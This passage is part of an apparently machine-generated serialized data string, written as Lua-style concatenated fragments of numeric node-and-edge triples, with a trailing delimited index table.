137,139>12>173,140>11>137,140>12>191,141>11>137,141>12>186,142>11>137,142>12>152,143>11>137,143>12>149,150>11>149,150>12>173,151>11>149,151>12>113,154>11>152,154>12>113,155>11>152,155>12>156,158>11>156,158>12>113,163>11>161,163>12>99,167>11>165,167>12>198,168>11>165,168>12>196,169>11>165,169>12>144,172>11>170,172>12>144,175>11>173,175>12>164,178>11>176,178>12>196,179>11>176,179>12>170,182>11>180,182>12>10,183>11>180,183>12>224,184>11>180,184>12>194,185>11>180,185>12>161,187>11>186,187>12>62,188>11>186,188>12>191,189>11>186,189>12>161,190>11>186,190>12>254,192>11>191,192>12>161,193>11>191,193>12>254,195>11>194,195>12>161,200>11>198,200>12>256,201>11>198,201>12>233,202>11>198,202>12>196,203>11>198,203>12>170,204>11>198,204>12>224,205>11>198,205>12>134,206>11>198,206>12>99,207>11>198,207>12>242,208>11>198,208>12>194,209>11>198,209>12>144,210>11>198,210>12>108,213>11>211,213>12>245,214>11>211,214>12>238,215>11>211,215>12>186,216>11>211,216>12>220,217>11>211,217>12>191'
- ..',218>11>211,218>12>164,219>11>211,219>12>10,222>11>220,222>12>164,223>11>220,223>12>113,225>11>224,225>12>254,226>11>224,226>12>10,227>11>224,227>12>242,230>11>228,230>12>33,237>11>235,237>12>233,240>11>238,240>12>274,241>11>238,241>12>231,244>11>242,244>12>254,247>11>245,247>12>186,249>11>248,249>12>245,250>11>248,250>12>211,251>11>248,251>12>238,258>11>256,258>12>228,259>11>256,259>12>252,260>11>256,260>12>233,263>11>261,263>12>254,264>11>261,264>12>274,265>11>261,265>12>231,268>11>266,268>12>186,269>11>266,269>12>271,270>11>266,270>12>254,272>11>271,272>12>254,273>11>271,273>12>261,278>11>276,278>12>261,279>11>276,279>12>238,282>11>280,282>12>7,283>13>298,285>11>284,285>12>298,287>11>286,287>12>298,295>11>294,295>12>298,297>11>296,297>12>298,303>11>302,303>12>280,356>11>355,356>12>2,357>11>355,357>12>280,757>11>755,757>12>4118,813>11>810,813>12>849,823>11>820,823>12>849,856>11>854,856>12>1161,857>11>854,857>12>1153,858>11>854,858>12>1158,859>13>862,860>13>862,861>13>862,867>11>862,867>12>1025,868>11>862,868>12>1016,869>11>862,869>12>1063,886>11>884,886>12>1076,914>11>912,914>12>1037,915>11>912,915>12>870,940>13>982,943>11>941,943>12>972,944>11>941,944>12>950,947>11>945,947>12>950,948>11>945,948>12>975,949>11>945,949>12>972,953>11>950,953>12>972,954>11>950,954>12>959,957>11>955,957>12>1013,958>11>955,958>12>985,961>11>959,961>12>972,962>11>959,962>12>969,967>11>965,967>12>1055,968>11>965,968>12>989,971>11>969,971>12>975,974>11>972,974>12>975,979>11>977,979>12>963,980>11>977,980>12>982,981>11>977,981>12>972,984>11>982,984>12>972,992>11>989,992>12>1023,995>11>993,995>12>871,996>11>993,996>12>982,998>11>997,998>12>1025,999>11>997,999>12>972,1000>11>997,1000>12>987,1003>11>1001,1003>12>972,1004>11>1001,1004>12>987,1007>11>1005,1007>12>972,1008>11>1005,1008>12>1001,1011>11>1009,1011>12>902,1012>11>1009,1012>12>982,1015>11>1013,1015>12>1044,1017>11>1016'
- ..',1017>12>1063,1018>11>1016,1018>12>972,1021>11>1019,1021>12>989,1022>11>1019,1022>12>1055,1027>11>1025,1027>12>1016,1028>11>1025,1028>12>987,1031>11>1029,1031>12>1023,1034>11>1032,1034>12>862,1035>11>1032,1035>12>1047,1036>11>1032,1036>12>1013,1038>11>1037,1038>12>987,1039>11>1037,1039>12>1096,1040>11>1037,1040>12>1063,1041>11>1037,1041>12>1013,1042>11>1037,1042>12>1120,1043>11>1037,1043>12>1044,1045>11>1044,1045>12>987,1046>11>1044,1046>12>1063,1048>11>1047,1048>12>1055,1049>11>1047,1049>12>1013,1052>11>1050,1052>12>1055,1053>11>1050,1053>12>1029,1054>11>1050,1054>12>1019,1057>11>1055,1057>12>985,1058>11>1055,1058>12>955,1059>11>1055,1059>12>1023,1060>11>1055,1060>12>989,1061>11>1055,1061>12>1114,1062>11>1055,1062>12>1094,1067>11>1065,1067>12>972,1068>11>1065,1068>12>1016,1069>11>1065,1069>12>1063,1071>11>1070,1071>12>1032,1072>11>1070,1072>12>862,1073>11>1070,1073>12>1106,1074>11>1070,1074>12>1094,1075>11>1070,1075>12>1055,1080>11>1078,1080>12>1089,1081>11>1078,1081>12>1117,1084>11>1082,1084>12>1055,1085>11>1082,1085>12>1114,1086>11>1082,1086>12>1087,1091>11>1089,1091>12>1099,1092>11>1089,1092>12>1063,1093>11>1089,1093>12>1130,1098>11>1096,1098>12>1063,1100>11>1099,1100>12>1096,1101>11>1099,1101>12>1063,1104>11>1102,1104>12>900,1105>11>1102,1105>12>1114,1108>11>1106,1108>12>1044,1109>11>1106,1109>12>862,1110>11>1106,1110>12>1120,1111>11>1106,1111>12>1117,1112>11>1106,1112>12>1037,1113>11>1106,1113>12>1094,1116>11>1114,1116>12>1076,1119>11>1117,1119>12>1130,1123>11>1122,1123>12>1120,1124>11>1122,1124>12>1106,1125>11>1122,1125>12>1117,1128>11>1126,1128>12>1089,1129>11>1126,1129>12>1117,1132>13>1146,1134>11>1133,1134>12>1146,1143>11>1142,1143>12>1146,1145>11>1144,1145>12>1146,1147>11>1146,1147>12>1135,1154>11>1153,1154>12>852,1156>11>1155,1156>12>852,1157>11>1155,1157>12>854,1160>11>1158,1160>12>852,1162>11>1161,1162>12>852,1189>11>1188,1189>12>1713,'
- ..'1212>11>1211,1212>12>1713,1220>11>1219,1220>12>1988,1673>11>1671,1673>12>1211,1674>11>1671,1674>12>3479,1675>11>1671,1675>12>1188,1696>13>1707,1708>11>1707,1708>12>1698,1709>11>1707,1709>12>1706,1710>11>1707,1710>12>1705,1711>11>1707,1711>12>1697,1715>13>1718,1716>13>1718,1717>13>1718,1766>11>1764,1766>12>1897,1767>11>1764,1767>12>1723,1792>13>1837,1795>11>1793,1795>12>1818,1796>11>1793,1796>12>1801,1799>11>1797,1799>12>1831,1800>11>1797,1800>12>1801,1804>11>1801,1804>12>1808,1807>11>1805,1807>12>1871,1810>11>1808,1810>12>1815,1817>11>1815,1817>12>1831,1820>11>1818,1820>12>1862,1821>11>1818,1821>12>1808,1822>11>1818,1822>12>1833,1823>11>1818,1823>12>1831,1824>11>1818,1824>12>1801,1825>11>1818,1825>12>1797,1826>11>1818,1826>12>1875,1827>11>1818,1827>12>1865,1828>11>1818,1828>12>1860,1829>11>1818,1829>12>1837,1830>11>1818,1830>12>1926,1835>11>1833,1835>12>1837,1836>11>1833,1836>12>1811,1841>11>1839,1841>12>1805,1844>11>1842,1844>12>1897,1845>11>1842,1845>12>1900,1846>11>1842,1846>12>1884,1847>11>1842,1847>12>1862,1848>11>1842,1848>12>1860,1852>11>1849,1852>12>1882,1853>11>1849,1853>12>1813,1854>11>1849,1854>12>1906,1855>11>1849,1855>12>1879,1858>11>1856,1858>12>1724,1859>11>1856,1859>12>1837,1861>11>1860,1861>12>1884,1864>11>1862,1864>12>1865,1869>11>1867,1869>12>1754,1870>11>1867,1870>12>1837,1873>11>1871,1873>12>1897,1874>11>1871,1874>12>1900,1876>11>1875,1876>12>1884,1877>11>1875,1877>12>1926,1878>11>1875,1878>12>1718,1881>11>1879,1881>12>1904,1886>11>1884,1886>12>1718,1889>11>1887,1889>12>1882,1890>11>1887,1890>12>1904,1893>11>1891,1893>12>1871,1894>11>1891,1894>12>1718,1895>11>1891,1895>12>1928,1896>11>1891,1896>12>1901,1898>11>1897,1898>12>1960,1899>11>1897,1899>12>1900,1902>11>1901,1902>12>1871,1903>11>1901,1903>12>1906,1908>11>1906,1908>12>1882,1909>11>1906,1909>12>1939,1910>11>1906,1910>12>1904,1911>11>1906,1911>12>1839,1912>11>1906,1912>12>1'
- ..'805,1913>11>1906,1913>12>1813,1914>11>1906,1914>12>1928,1915>11>1906,1915>12>1879,1916>11>1906,1916>12>1948,1919>11>1917,1919>12>1875,1920>11>1917,1920>12>1897,1921>11>1917,1921>12>1956,1922>11>1917,1922>12>1944,1923>11>1917,1923>12>1900,1924>11>1917,1924>12>1926,1925>11>1917,1925>12>1718,1929>11>1928,1929>12>1718,1930>11>1928,1930>12>1960,1931>11>1928,1931>12>1948,1934>11>1932,1934>12>1737,1935>11>1932,1935>12>1964,1938>11>1936,1938>12>1944,1943>11>1941,1943>12>1939,1946>11>1944,1946>12>1986,1947>11>1944,1947>12>1956,1950>11>1948,1950>12>1960,1953>11>1951,1953>12>1897,1954>11>1951,1954>12>1917,1955>11>1951,1955>12>1956,1959>11>1957,1959>12>1752,1962>11>1960,1962>12>1718,1963>11>1960,1963>12>1900,1966>11>1964,1966>12>1939,1967>11>1964,1967>12>1957,1968>11>1964,1968>12>1906,1971>11>1969,1971>12>1960,1972>11>1969,1972>12>1936,1973>11>1969,1973>12>1981,1974>11>1969,1974>12>1986,1975>11>1969,1975>12>1983,1978>11>1976,1978>12>1897,1979>11>1976,1979>12>1960,1980>11>1976,1980>12>1981,1982>11>1981,1982>12>1960,1985>11>1983,1985>12>1944,1990>11>1988,1990>12>1997,1993>11>1991,1993>12>2623,1994>11>1991,1994>12>1999,1995>11>1991,1995>12>1997,1996>11>1991,1996>12>1219,2000>11>1999,2000>12>1988,2035>11>2034,2035>12>1713,2036>11>2034,2036>12>1671,2037>13>2052,2039>11>2038,2039>12>2052,2041>11>2040,2041>12>2052,2049>11>2048,2049>12>2052,2051>11>2050,2051>12>2052,2054>13>2057,2055>13>2057,2056>13>2057,2062>11>2057,2062>12>2303,2063>11>2057,2063>12>2223,2064>11>2057,2064>12>2212,2065>11>2057,2065>12>2228,2066>11>2057,2066>12>2268,2070>11>2068,2070>12>2192,2101>11>2099,2101>12>2205,2112>11>2110,2112>12>2067,2113>11>2110,2113>12>2230,2138>13>2178,2141>11>2139,2141>12>2167,2142>11>2139,2142>12>2147,2145>11>2143,2145>12>2167,2146>11>2143,2146>12>2147,2150>11>2147,2150>12>2167,2155>11>2153,2155>12>2167,2156>11>2153,2156>12>2164,2157>11>2153,2157>12>2147,2160>11>2158,2160>'
- ..'12>2174,2163>11>2161,2163>12>2189,2166>11>2164,2166>12>2170,2169>11>2167,2169>12>2203,2172>11>2170,2172>12>2167,2173>11>2170,2173>12>2143,2176>11>2174,2176>12>2178,2177>11>2174,2177>12>2167,2180>11>2178,2180>12>2205,2181>11>2178,2181>12>2192,2182>11>2178,2182>12>2167,2185>11>2183,2185>12>2151,2188>11>2186,2188>12>2230,2195>11>2194,2195>12>2223,2196>11>2194,2196>12>2186,2197>11>2194,2197>12>2167,2200>11>2198,2200>12>2186,2201>11>2198,2201>12>2203,2202>11>2198,2202>12>2167,2209>11>2207,2209>12>2230,2210>11>2207,2210>12>2228,2211>11>2207,2211>12>2151,2213>11>2212,2213>12>2223,2214>11>2212,2214>12>2167,2217>11>2215,2217>12>2245,2218>11>2215,2218>12>2189,2221>11>2219,2221>12>2189,2222>11>2219,2222>12>2226,2225>11>2223,2225>12>2186,2232>11>2231,2232>12>2303,2233>11>2231,2233>12>2230,2234>11>2231,2234>12>2207,2235>11>2231,2235>12>2186,2237>11>2236,2237>12>2228,2238>11>2236,2238>12>2245,2239>11>2236,2239>12>2207,2242>11>2240,2242>12>2245,2243>11>2240,2243>12>2215,2244>11>2240,2244>12>2226,2247>11>2245,2247>12>2278,2248>11>2245,2248>12>2219,2249>11>2245,2249>12>2183,2250>11>2245,2250>12>2151,2251>11>2245,2251>12>2189,2252>11>2245,2252>12>2307,2253>11>2245,2253>12>2161,2256>11>2254,2256>12>2294,2257>11>2254,2257>12>2283,2258>11>2254,2258>12>2230,2259>11>2254,2259>12>2057,2260>11>2254,2260>12>2264,2261>11>2254,2261>12>2231,2262>11>2254,2262>12>2298,2263>11>2254,2263>12>2212,2266>11>2264,2266>12>2212,2267>11>2264,2267>12>2167,2269>11>2268,2269>12>2303,2270>11>2268,2270>12>2228,2271>11>2268,2271>12>2245,2274>11>2272,2274>12>2082,2275>11>2272,2275>12>2307,2282>11>2280,2282>12>2278,2285>11>2283,2285>12>2298,2286>11>2283,2286>12>2325,2287>11>2283,2287>12>2323,2288>11>2283,2288>12>2276,2291>11>2289,2291>12>2303,2292>11>2289,2292>12>2268,2293>11>2289,2293>12>2245,2296>11>2294,2296>12>2298,2297>11>2294,2297>12>2230,2301>11>2299,2301>12>2097,2302>11>2299,2302>12>2307,2'
- ..'305>11>2303,2305>12>2322,2306>11>2303,2306>12>2230,2309>11>2307,2309>12>2278,2312>11>2310,2312>12>2322,2313>11>2310,2313>12>2303,2314>11>2310,2314>12>2325,2315>11>2310,2315>12>2323,2316>11>2310,2316>12>2276,2319>11>2317,2319>12>2322,2320>11>2317,2320>12>2230,2321>11>2317,2321>12>2303,2329>13>2344,2331>11>2330,2331>12>2344,2333>11>2332,2333>12>2344,2341>11>2340,2341>12>2344,2343>11>2342,2343>12>2344,2346>13>2349,2347>13>2349,2348>13>2349,2354>11>2349,2354>12>2553,2355>11>2349,2355>12>2595,2356>11>2349,2356>12>2504,2357>11>2349,2357>12>2523,2358>11>2349,2358>12>2563,2392>11>2390,2392>12>2497,2403>11>2401,2403>12>2359,2428>13>2472,2431>11>2429,2431>12>2459,2432>11>2429,2432>12>2438,2435>11>2433,2435>12>2464,2436>11>2433,2436>12>2459,2437>11>2433,2437>12>2438,2443>11>2441,2443>12>2500,2444>11>2441,2444>12>2544,2445>11>2441,2445>12>2475,2448>11>2446,2448>12>2459,2449>11>2446,2449>12>2457,2450>11>2446,2450>12>2438,2455>11>2453,2455>12>2544,2456>11>2453,2456>12>2480,2461>11>2459,2461>12>2495,2462>11>2459,2462>12>2464,2463>11>2459,2463>12>2438,2466>11>2464,2466>12>2457,2469>11>2467,2469>12>2451,2470>11>2467,2470>12>2472,2471>11>2467,2471>12>2459,2474>11>2472,2474>12>2459,2479>11>2477,2479>12>2537,2485>11>2483,2485>12>2360,2486>11>2483,2486>12>2472,2488>11>2487,2488>12>2477,2489>11>2487,2489>12>2459,2492>11>2490,2492>12>2477,2493>11>2490,2493>12>2495,2494>11>2490,2494>12>2459,2499>11>2497,2499>12>2472,2502>11>2500,2502>12>2537,2503>11>2500,2503>12>2538,2505>11>2504,2505>12>2553,2506>11>2504,2506>12>2459,2509>11>2507,2509>12>2480,2512>11>2510,2512>12>2544,2513>11>2510,2513>12>2480,2514>11>2510,2514>12>2521,2517>11>2515,2517>12>2349,2518>11>2515,2518>12>2504,2519>11>2515,2519>12>2487,2520>11>2515,2520>12>2477,2525>11>2523,2525>12>2563,2526>11>2523,2526>12>2538,2527>11>2523,2527>12>2500,2529>11>2528,2529>12>2607,2530>11>2528,2530>12>2401,2531>11>2528,2531>12>25'
- ..'85,2532>11>2528,2532>12>2595,2533>11>2528,2533>12>2553,2534>11>2528,2534>12>2537,2535>11>2528,2535>12>2500,2536>11>2528,2536>12>2477,2541>11>2539,2541>12>2544,2542>11>2539,2542>12>2507,2543>11>2539,2543>12>2521,2546>11>2544,2546>12>2563,2547>11>2544,2547>12>2583,2548>11>2544,2548>12>2600,2549>11>2544,2549>12>2538,2550>11>2544,2550>12>2507,2551>11>2544,2551>12>2480,2552>11>2544,2552>12>2475,2555>11>2553,2555>12>2585,2556>11>2553,2556>12>2581,2557>11>2553,2557>12>2537,2560>11>2558,2560>12>2553,2561>11>2558,2561>12>2504,2562>11>2558,2562>12>2459,2564>11>2563,2564>12>2595,2565>11>2563,2565>12>2583,2568>11>2566,2568>12>2373,2569>11>2566,2569>12>2600,2572>11>2570,2572>12>2602,2573>11>2570,2573>12>2581,2576>11>2574,2576>12>2544,2577>11>2574,2577>12>2600,2578>11>2574,2578>12>2579,2588>11>2587,2588>12>2585,2589>11>2587,2589>12>2553,2590>11>2587,2590>12>2581,2593>11>2591,2593>12>2388,2594>11>2591,2594>12>2600,2597>11>2595,2597>12>2607,2598>11>2595,2598>12>2537,2599>11>2595,2599>12>2583,2604>11>2602,2604>12>2609,2605>11>2602,2605>12>2595,2606>11>2602,2606>12>2616,2610>11>2609,2610>12>2607,2611>11>2609,2611>12>2595,2614>11>2612,2614>12>2602,2615>11>2612,2615>12>2581,2618>11>2616,2618>12>2581,2621>11>2619,2621>12>2625,2622>11>2619,2622>12>2327,2624>11>2623,2624>12>1988,2628>11>2627,2628>12>2625,2629>11>2627,2629>12>2327,2807>11>2805,2807>12>2802,2811>11>2808,2811>12>2802,2813>11>2812,2813>12>2876,2814>11>2812,2814>12>2878,2815>11>2812,2815>12>2897,2828>11>2825,2828>12>2812,2971>11>2970,2971>12>3102,2972>11>2970,2972>12>3099,2975>11>2974,2975>12>2976,2977>11>2976,2977>12>2973,2978>11>2976,2978>12>3078,2980>11>2979,2980>12>3065,2981>11>2979,2981>12>3118,2983>11>2982,2983>12>3107,2984>11>2982,2984>12>2974,2986>11>2985,2986>12>2993,2989>11>2988,2989>12>3104,2990>11>2988,2990>12>3058,2991>11>2988,2991>12>2970,2994>11>2993,2994>12>3003,2996>11>2995,2996>12>3018,2997>1'
- ..'1>2995,2997>12>3006,2998>11>2995,2998>12>3077,3000>11>2999,3000>12>2992,3001>11>2999,3001>12>3052,3002>11>2999,3002>12>3121,3007>11>3006,3007>12>3123,3009>11>3008,3009>12>2987,3010>11>3008,3010>12>2979,3013>11>3011,3013>12>2812,3014>11>3011,3014>12>3960,3016>11>3015,3016>12>2992,3017>11>3015,3017>12>3018,3028>11>3027,3028>12>3030,3029>11>3027,3029>12>3121,3031>11>3030,3031>12>2985,3033>11>3032,3033>12>3078,3034>11>3032,3034>12>2974,3036>11>3035,3036>12>3042,3037>11>3035,3037>12>3065,3041>11>3040,3041>12>2987,3045>11>3044,3045>12>3055,3046>11>3044,3046>12>3032,3047>11>3044,3047>12>2982,3049>11>3048,3049>12>3040,3050>11>3048,3050>12>3008,3051>11>3048,3051>12>3065,3053>11>3052,3053>12>3087,3054>11>3052,3054>12>3027,3056>11>3055,3056>12>3107,3057>11>3055,3057>12>3043,3059>11>3058,3059>12>3043,3061>11>3060,3061>12>3063,3062>11>3060,3062>12>3003,3064>11>3063,3064>12>3070,3067>11>3066,3067>12>3077,3068>11>3066,3068>12>3083,3069>11>3066,3069>12>3006,3071>11>3070,3071>12>3040,3072>11>3070,3072>12>3112,3074>11>3073,3074>12>3042,3075>11>3073,3075>12>2973,3076>11>3073,3076>12>3078,3080>11>3079,3080>12>3015,3081>11>3079,3081>12>3084,3082>11>3079,3082>12>3087,3085>11>3084,3085>12>3018,3086>11>3084,3086>12>3077,3088>11>3087,3088>12>2992,3092>11>3091,3092>12>3060,3093>11>3091,3093>12>3030,3094>11>3091,3094>12>2993,3100>11>3099,3100>12>3108,3101>11>3099,3101>12>3058,3103>11>3102,3103>12>3108,3105>11>3104,3105>12>3107,3106>11>3104,3106>12>3043,3110>11>3109,3110>12>2973,3111>11>3109,3111>12>3042,3113>11>3112,3113>12>2987,3115>11>3114,3115>12>3112,3116>11>3114,3116>12>3063,3117>11>3114,3117>12>3003,3119>11>3118,3119>12>3109,3120>11>3118,3120>12>3035,3122>11>3121,3122>12>2985,3124>11>3123,3124>12>3303,3125>11>3123,3125>12>3083,3139>11>3138,3139>12>3135,3142>11>3141,3142>12>3145,3143>11>3141,3143>12>3146,3144>11>3141,3144>12>3147,3149>11>3148,3149>12>3146,3150>11>3148,31'
- ..'50>12>3147,3157>11>3156,3157>12>3207,3158>11>3156,3158>12>3225,3159>11>3156,3159>12>3163,3160>11>3156,3160>12>3170,3161>11>3156,3161>12>3227,3221>11>3219,3221>12>3202,3246>11>3243,3246>12>3202,3298>11>3297,3298>12>3301,3299>11>3297,3299>12>3303,3300>11>3297,3300>12>3083,3302>11>3301,3302>12>3126,3304>11>3303,3304>12>3126,3306>11>3305,3306>12>3146,3307>11>3305,3307>12>3145,3481>11>3479,3481>12>1713,3483>11>3482,3483>12>3509,3485>11>3484,3485>12>3509,3535>13>3550,3537>11>3536,3537>12>3550,3539>11>3538,3539>12>3550,3547>11>3546,3547>12>3550,3549>11>3548,3549>12>3550,3554>11>3552,3554>12>4041,3555>11>3552,3555>12>3484,3556>11>3552,3556>12>4084,3557>11>3552,3557>12>3482,3558>13>3561,3559>13>3561,3560>13>3561,3566>11>3561,3566>12>3732,3567>11>3561,3567>12>3771,3568>11>3561,3568>12>3715,3570>11>3569,3570>12>3612,3573>11>3571,3573>12>3698,3638>13>3680,3643>11>3641,3643>12>3667,3647>11>3644,3647>12>3639,3648>11>3644,3648>12>3655,3649>11>3644,3649>12>3667,3650>11>3644,3650>12>3641,3653>11>3651,3653>12>3686,3654>11>3651,3654>12>3712,3657>11>3655,3657>12>3667,3660>11>3658,3660>12>3678,3665>11>3663,3665>12>3655,3666>11>3663,3666>12>3674,3669>11>3667,3669>12>3639,3670>11>3667,3670>12>3715,3671>11>3667,3671>12>3700,3672>11>3667,3672>12>3678,3673>11>3667,3673>12>3769,3676>11>3674,3676>12>3667,3677>11>3674,3677>12>3641,3682>11>3680,3682>12>3678,3683>11>3680,3683>12>3698,3684>11>3680,3684>12>3667,3685>11>3680,3685>12>3709,3690>11>3688,3690>12>3741,3691>11>3688,3691>12>3737,3692>11>3688,3692>12>3700,3696>11>3693,3696>12>3661,3697>11>3693,3697>12>3717,3703>11>3701,3703>12>3706,3704>11>3701,3704>12>3688,3705>11>3701,3705>12>3667,3708>11>3706,3708>12>3667,3711>11>3709,3711>12>3602,3714>11>3712,3714>12>3743,3716>11>3715,3716>12>3769,3721>11>3719,3721>12>3749,3722>11>3719,3722>12>3730,3723>11>3719,3723>12>3693,3726>11>3724,3726>12>3688,3727>11>3724,3727>12>3561,3728>11>372'
- ..'4,3728>12>3715,3729>11>3724,3729>12>3700,3734>11>3732,3734>12>3712,3735>11>3732,3735>12>3771,3736>11>3732,3736>12>3743,3738>11>3737,3738>12>3712,3739>11>3737,3739>12>3612,3740>11>3737,3740>12>3741,3742>11>3741,3742>12>3712,3746>11>3744,3746>12>3749,3747>11>3744,3747>12>3730,3748>11>3744,3748>12>3717,3751>11>3749,3751>12>3686,3752>11>3749,3752>12>3661,3753>11>3749,3753>12>3811,3754>11>3749,3754>12>3651,3755>11>3749,3755>12>3717,3756>11>3749,3756>12>3771,3757>11>3749,3757>12>3743,3758>11>3749,3758>12>3779,3759>11>3749,3759>12>3693,3760>11>3749,3760>12>3787,3763>11>3761,3763>12>3737,3764>11>3761,3764>12>3715,3765>11>3761,3765>12>3785,3766>11>3761,3766>12>3741,3767>11>3761,3767>12>3561,3768>11>3761,3768>12>3769,3774>11>3772,3774>12>3585,3775>11>3772,3775>12>3811,3778>11>3776,3778>12>3785,3781>11>3779,3781>12>3783,3782>11>3779,3782>12>3811,3789>11>3787,3789>12>3771,3792>11>3790,3792>12>3737,3793>11>3790,3793>12>3761,3795>11>3794,3795>12>3761,3796>11>3794,3796>12>3790,3797>11>3794,3797>12>3785,3800>11>3798,3800>12>3600,3801>11>3798,3801>12>3811,3804>11>3802,3804>12>3771,3805>11>3802,3805>12>3737,3806>11>3802,3806>12>3561,3807>11>3802,3807>12>3818,3808>11>3802,3808>12>3813,3809>11>3802,3809>12>3787,3810>11>3802,3810>12>3741,3815>11>3813,3815>12>3776,3816>11>3813,3816>12>3828,3817>11>3813,3817>12>3825,3820>11>3818,3820>12>3737,3822>11>3821,3822>12>3802,3823>11>3821,3823>12>3818,3824>11>3821,3824>12>3813,3827>11>3825,3827>12>3785,3830>11>3828,3830>12>3785,3832>11>3831,3832>12>2625,3833>11>3831,3833>12>2327,3895>11>3893,3895>12>3960,3955>11>3953,3955>12>3960,3961>11>3960,3961>12>3967,3962>11>3960,3962>12>3958,3963>11>3960,3963>12>3845,3966>11>3964,3966>12>3960,3977>11>3974,3977>12>3960,3999>11>3997,3999>12>4002,4005>11>4002,4005>12>3978,4042>11>4041,4042>12>3509,4044>11>4043,4044>12>2625,4045>11>4043,4045>12>2327,4048>11>4046,4048>12>280,4086>11>4084,4086>12>'
- ..'3509,4112>11>4111,4112>12>4678,4113>11>4111,4113>12>4266,4119>11>4118,4119>12>4129,4120>11>4118,4120>12>4750,4121>11>4118,4121>12>4127,4122>11>4118,4122>12>4754,4123>11>4118,4123>12>760,4124>11>4118,4124>12>4734,4125>11>4118,4125>12>4770,4126>11>4118,4126>12>4736,4141>11>4140,4141>12>4142,4143>11>4142,4143>12>4132,4144>11>4142,4144>12>4139,4145>11>4142,4145>12>4131,4268>11>4266,4268>12>4381,4269>11>4266,4269>12>4083,4359>11>4358,4359>12>4266,4360>11>4358,4360>12>4678,4396>11>4394,4396>12>4118,4401>13>4404,4402>13>4404,4403>13>4404,4409>11>4404,4409>12>4652,4410>11>4404,4410>12>4607,4414>11>4412,4414>12>4541,4443>11>4441,4443>12>4649,4446>11>4444,4446>12>4554,4457>11>4455,4457>12>4583,4458>11>4455,4458>12>4411,4483>13>4524,4486>11>4484,4486>12>4514,4487>11>4484,4487>12>4493,4490>11>4488,4490>12>4517,4491>11>4488,4491>12>4514,4492>11>4488,4492>12>4493,4496>11>4493,4496>12>4514,4501>11>4499,4501>12>4514,4502>11>4499,4502>12>4493,4505>11>4503,4505>12>4520,4508>11>4506,4508>12>4602,4509>11>4506,4509>12>4536,4512>11>4510,4512>12>4499,4513>11>4510,4513>12>4517,4516>11>4514,4516>12>4524,4519>11>4517,4519>12>4514,4522>11>4520,4522>12>4514,4523>11>4520,4523>12>4524,4526>11>4524,4526>12>4541,4529>11>4527,4529>12>4602,4530>11>4527,4530>12>4497,4533>11>4531,4533>12>4591,4534>11>4531,4534>12>4572,4535>11>4531,4535>12>4543,4539>11>4536,4539>12>4602,4540>11>4536,4540>12>4565,4544>11>4543,4544>12>4572,4545>11>4543,4545>12>4514,4548>11>4546,4548>12>4551,4549>11>4546,4549>12>4531,4550>11>4546,4550>12>4514,4553>11>4551,4553>12>4514,4556>11>4554,4556>12>4524,4559>11>4557,4559>12>4497,4561>11>4560,4561>12>4404,4562>11>4560,4562>12>4572,4563>11>4560,4563>12>4607,4564>11>4560,4564>12>4514,4569>11>4567,4569>12>4602,4570>11>4567,4570>12>4575,4571>11>4567,4571>12>4536,4574>11>4572,4574>12>4404,4577>11>4575,4577>12>4598,4580>11>4578,4580>12>4557,4581>11>4578,4581>12>4404,4582>'
- ..'11>4578,4582>12>4595,4584>11>4583,4584>12>4557,4585>11>4583,4585>12>4531,4586>11>4583,4586>12>4659,4587>11>4583,4587>12>4643,4588>11>4583,4588>12>4652,4589>11>4583,4589>12>4607,4590>11>4583,4590>12>4591,4592>11>4591,4592>12>4652,4593>11>4591,4593>12>4607,4594>11>4591,4594>12>4557,4596>11>4595,4596>12>4557,4597>11>4595,4597>12>4602,4600>11>4598,4600>12>4602,4601>11>4598,4601>12>4565,4604>11>4602,4604>12>4497,4605>11>4602,4605>12>4565,4606>11>4602,4606>12>4654,4611>11>4609,4611>12>4560,4612>11>4609,4612>12>4607,4613>11>4609,4613>12>4514,4615>11>4614,4615>12>4404,4616>11>4614,4616>12>4578,4617>11>4614,4617>12>4652,4618>11>4614,4618>12>4639,4619>11>4614,4619>12>4602,4622>11>4620,4622>12>4426,4623>11>4620,4623>12>4654,4626>11>4624,4626>12>4656,4627>11>4624,4627>12>4635,4630>11>4628,4630>12>4633,4631>11>4628,4631>12>4654,4632>11>4628,4632>12>4602,4637>11>4635,4637>12>4607,4638>11>4635,4638>12>4647,4641>11>4639,4641>12>4652,4642>11>4639,4642>12>4602,4645>11>4643,4645>12>4607,4646>11>4643,4646>12>4647,4648>11>4647,4648>12>4607,4651>11>4649,4651>12>4654,4658>11>4656,4658>12>4652,4661>11>4659,4661>12>4652,4663>11>4662,4663>12>4659,4664>11>4662,4664>12>4652,4665>11>4662,4665>12>4656,4668>11>4666,4668>12>4656,4669>11>4666,4669>12>4635,4672>11>4670,4672>12>4656,4673>11>4670,4673>12>4635,4675>11>4674,4675>12>847,4676>11>4674,4676>12>849,4677>11>4674,4677>12>4399,4680>11>4678,4680>12>4381,4681>11>4678,4681>12>4083;2;n;1|2:2|3:3|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:10|10:11;4|9:10|10:12;4|9:10|10:13;p;1|2:2|3:14|4:15;2|1:16;n;2|1:17;n;1|1:18|5:19|14:2|3:20|15:21|16:22|4:23|17:24|18:25|5:19|5:19;n;5|3:26|19:27;6|20:27;7;8|1:28;9|9:10|10:29;9|9:10|10:30;9|9:10|10:31;p;10|5:32|3:33|15:21|16:34|4:35|17:25|18:24|5:32|5:32;1|1:36|5:37|3:38|15:21|16:39|4:40|17:24|21:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;7;12|1:45|25:46;12|1:45|25:46;12|1:45|25:47;12|'
